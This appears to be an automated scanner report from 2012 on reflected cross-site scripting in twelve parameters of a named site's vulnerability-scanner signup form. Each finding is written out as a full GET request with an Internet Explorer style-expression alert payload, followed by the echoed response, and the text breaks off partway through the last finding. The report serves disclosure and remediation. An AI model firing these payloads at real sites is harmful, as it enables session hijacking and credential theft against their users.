XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, secure.beyondsecurity.com

Report generated by XSS.Cx at Sun Jan 29 07:58:51 CST 2012.

Loading



1. Cross-site scripting (reflected)

1.1. https://secure.beyondsecurity.com/vulnerability-scanner-signup [address parameter]

1.2. https://secure.beyondsecurity.com/vulnerability-scanner-signup [city parameter]

1.3. https://secure.beyondsecurity.com/vulnerability-scanner-signup [comment parameter]

1.4. https://secure.beyondsecurity.com/vulnerability-scanner-signup [company parameter]

1.5. https://secure.beyondsecurity.com/vulnerability-scanner-signup [email parameter]

1.6. https://secure.beyondsecurity.com/vulnerability-scanner-signup [hostname parameter]

1.7. https://secure.beyondsecurity.com/vulnerability-scanner-signup [name parameter]

1.8. https://secure.beyondsecurity.com/vulnerability-scanner-signup [nameoncard parameter]

1.9. https://secure.beyondsecurity.com/vulnerability-scanner-signup [password parameter]

1.10. https://secure.beyondsecurity.com/vulnerability-scanner-signup [phonenumber parameter]

1.11. https://secure.beyondsecurity.com/vulnerability-scanner-signup [state parameter]

1.12. https://secure.beyondsecurity.com/vulnerability-scanner-signup [zipcode parameter]

2. Password field with autocomplete enabled

3. Cross-domain Referer leakage

4. Cross-domain script include

4.1. https://secure.beyondsecurity.com/

4.2. https://secure.beyondsecurity.com/vulnerability-scanner-signup

5. Email addresses disclosed

5.1. https://secure.beyondsecurity.com/

5.2. https://secure.beyondsecurity.com/vulnerability-scanner-signup

5.3. https://secure.beyondsecurity.com/vulnerability-scanner-signup

6. Cacheable HTTPS response

6.1. https://secure.beyondsecurity.com/

6.2. https://secure.beyondsecurity.com/vulnerability-scanner-signup

7. Content type incorrectly stated

7.1. https://secure.beyondsecurity.com/

7.2. https://secure.beyondsecurity.com/vulnerability-scanner-signup



1. Cross-site scripting (reflected)  next
There are 12 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://secure.beyondsecurity.com/vulnerability-scanner-signup [address parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The value of the address request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7817"style%3d"x%3aexpression(alert(1))"0b356777e0e6304a2 was submitted in the address parameter. This input was echoed as a7817"style="x:expression(alert(1))"0b356777e0e6304a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=1&c=&step=2&email=&password=&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=a7817"style%3d"x%3aexpression(alert(1))"0b356777e0e6304a2&zipcode=&city=&state=&country=US&phonenumber=&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=&rtype=advanced&itype.x=23&itype.y=10&itype=advanced HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:16:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18758
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="address" value="a7817"style="x:expression(alert(1))"0b356777e0e6304a2">
...[SNIP]...

1.2. https://secure.beyondsecurity.com/vulnerability-scanner-signup [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce67"style%3d"x%3aexpression(alert(1))"4d7ae7c58d8368a48 was submitted in the city parameter. This input was echoed as 9ce67"style="x:expression(alert(1))"4d7ae7c58d8368a48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=1&c=&step=2&email=&password=&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=&city=9ce67"style%3d"x%3aexpression(alert(1))"4d7ae7c58d8368a48&state=&country=US&phonenumber=&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=&rtype=advanced&itype.x=23&itype.y=10&itype=advanced HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:17:02 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18758
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="city" value="9ce67"style="x:expression(alert(1))"4d7ae7c58d8368a48">
...[SNIP]...

1.3. https://secure.beyondsecurity.com/vulnerability-scanner-signup [comment parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The value of the comment request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3159"style%3d"x%3aexpression(alert(1))"60af6462e90954018 was submitted in the comment parameter. This input was echoed as c3159"style="x:expression(alert(1))"60af6462e90954018 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=1&c=&step=2&email=&password=&next=Next&hostname=&comment=c3159"style%3d"x%3aexpression(alert(1))"60af6462e90954018&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=&city=&state=&country=US&phonenumber=&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=&rtype=advanced&itype.x=23&itype.y=10&itype=advanced HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:16:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18758
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="comment" value="c3159"style="x:expression(alert(1))"60af6462e90954018">
...[SNIP]...

1.4. https://secure.beyondsecurity.com/vulnerability-scanner-signup [company parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The value of the company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b17a7"style%3d"x%3aexpression(alert(1))"0397febb7ac687702 was submitted in the company parameter. This input was echoed as b17a7"style="x:expression(alert(1))"0397febb7ac687702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=1&c=&step=2&email=&password=&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=b17a7"style%3d"x%3aexpression(alert(1))"0397febb7ac687702&address=&zipcode=&city=&state=&country=US&phonenumber=&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=&rtype=advanced&itype.x=23&itype.y=10&itype=advanced HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:16:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18758
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="company" value="b17a7"style="x:expression(alert(1))"0397febb7ac687702">
...[SNIP]...

1.5. https://secure.beyondsecurity.com/vulnerability-scanner-signup [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b93ba"style%3d"x%3aexpression(alert(1))"19f61ff8538a63a62 was submitted in the email parameter. This input was echoed as b93ba"style="x:expression(alert(1))"19f61ff8538a63a62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=1&c=&step=2&email=b93ba"style%3d"x%3aexpression(alert(1))"19f61ff8538a63a62&password=&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=&city=&state=&country=US&phonenumber=&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=&rtype=advanced&itype.x=23&itype.y=10&itype=advanced HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:15:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18758
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="text" name="email" id="emailaddress" size="30" value="b93ba"style="x:expression(alert(1))"19f61ff8538a63a62" onkeypress="javascript:return noEnter(event);">
...[SNIP]...

1.6. https://secure.beyondsecurity.com/vulnerability-scanner-signup [hostname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The value of the hostname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd78f"style%3d"x%3aexpression(alert(1))"eb9c37b0e754a483 was submitted in the hostname parameter. This input was echoed as cd78f"style="x:expression(alert(1))"eb9c37b0e754a483 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=1&c=&step=2&email=&password=&next=Next&hostname=cd78f"style%3d"x%3aexpression(alert(1))"eb9c37b0e754a483&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=&city=&state=&country=US&phonenumber=&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=&rtype=advanced&itype.x=23&itype.y=10&itype=advanced HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:16:06 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18757
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="hostname" value="cd78f"style="x:expression(alert(1))"eb9c37b0e754a483">
...[SNIP]...

1.7. https://secure.beyondsecurity.com/vulnerability-scanner-signup [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a92eb"style%3d"x%3aexpression(alert(1))"ec01e1b6fb32717c3 was submitted in the name parameter. This input was echoed as a92eb"style="x:expression(alert(1))"ec01e1b6fb32717c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=1&c=&step=2&email=&password=&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=a92eb"style%3d"x%3aexpression(alert(1))"ec01e1b6fb32717c3&company=&address=&zipcode=&city=&state=&country=US&phonenumber=&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=&rtype=advanced&itype.x=23&itype.y=10&itype=advanced HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:16:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18758
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="name" value="a92eb"style="x:expression(alert(1))"ec01e1b6fb32717c3">
...[SNIP]...

1.8. https://secure.beyondsecurity.com/vulnerability-scanner-signup [nameoncard parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The value of the nameoncard request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a99"style%3d"x%3aexpression(alert(1))"2991779e0b5534f1c was submitted in the nameoncard parameter. This input was echoed as 28a99"style="x:expression(alert(1))"2991779e0b5534f1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=1&c=&step=2&email=&password=&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=&city=&state=&country=US&phonenumber=&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=28a99"style%3d"x%3aexpression(alert(1))"2991779e0b5534f1c&rtype=advanced&itype.x=23&itype.y=10&itype=advanced HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:17:30 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18758
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="nameoncard" value="28a99"style="x:expression(alert(1))"2991779e0b5534f1c" />
...[SNIP]...

1.9. https://secure.beyondsecurity.com/vulnerability-scanner-signup [password parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20d1f"style%3d"x%3aexpression(alert(1))"b3737fc3d7e7f01c3 was submitted in the password parameter. This input was echoed as 20d1f"style="x:expression(alert(1))"b3737fc3d7e7f01c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=2&c=&step=3&type=advanced&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=&city=&state=&country=US&phonenumber=&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=&email=rft34efr43tf%40rr.com&password=4tf3e4rt34er20d1f"style%3d"x%3aexpression(alert(1))"b3737fc3d7e7f01c3&next.x=42&next.y=9 HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/vulnerability-scanner-signup?fromstep=1&

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:17:58 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 20094
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="password" value="4tf3e4rt34er20d1f"style="x:expression(alert(1))"b3737fc3d7e7f01c3" />
...[SNIP]...

1.10. https://secure.beyondsecurity.com/vulnerability-scanner-signup [phonenumber parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The value of the phonenumber request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfe66"style%3d"x%3aexpression(alert(1))"9fdd9dd16e3fe333f was submitted in the phonenumber parameter. This input was echoed as cfe66"style="x:expression(alert(1))"9fdd9dd16e3fe333f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=1&c=&step=2&email=&password=&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=&city=&state=&country=US&phonenumber=cfe66"style%3d"x%3aexpression(alert(1))"9fdd9dd16e3fe333f&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=&rtype=advanced&itype.x=23&itype.y=10&itype=advanced HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:17:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18758
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="phonenumber" value="cfe66"style="x:expression(alert(1))"9fdd9dd16e3fe333f">
...[SNIP]...

1.11. https://secure.beyondsecurity.com/vulnerability-scanner-signup [state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
Path:   /vulnerability-scanner-signup

Issue detail

The value of the state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c146"style%3d"x%3aexpression(alert(1))"c48242c29cd166e47 was submitted in the state parameter. This input was echoed as 6c146"style="x:expression(alert(1))"c48242c29cd166e47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vulnerability-scanner-signup?fromstep=1&c=&step=2&email=&password=&next=Next&hostname=&comment=&os=yes&website=yes&infrastructure=yes&injection=yes&name=&company=&address=&zipcode=&city=&state=6c146"style%3d"x%3aexpression(alert(1))"c48242c29cd166e47&country=US&phonenumber=&extension=&chargeamounttype=regular&cardnumber=&issuer=&expmonth=&expyear=&nameoncard=&rtype=advanced&itype.x=23&itype.y=10&itype=advanced HTTP/1.1
Host: secure.beyondsecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.beyondsecurity.com/?from=seal

Response

HTTP/1.1 200 OK
Date: Sun, 29 Jan 2012 13:17:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 18758
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- inner.tmpl -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<input type="hidden" name="state" value="6c146"style="x:expression(alert(1))"c48242c29cd166e47">
...[SNIP]...

1.12. https://secure.beyondsecurity.com/vulnerability-scanner-signup [zipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.beyondsecurity.com
